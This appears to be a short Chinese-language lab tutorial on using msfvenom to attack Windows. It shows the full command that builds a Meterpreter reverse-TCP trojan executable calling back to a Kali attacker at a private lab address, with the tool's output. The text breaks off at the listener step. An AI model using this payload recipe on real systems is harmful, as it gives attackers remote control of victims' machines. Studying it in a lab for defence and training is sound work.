msfvenom生成木马攻击windows

实验环境

攻击机:kali     IP:192.168.43.5
靶机:windows

生成木马攻击windows

1.在kali上生成反弹木马

root@afei:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.5 lport=55555 -f exe > test.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Desktop  hack-tools  test.exe
root@afei:~# 

2.在kali上开启监听

root@afei:~

你可能感兴趣的:(网络安全)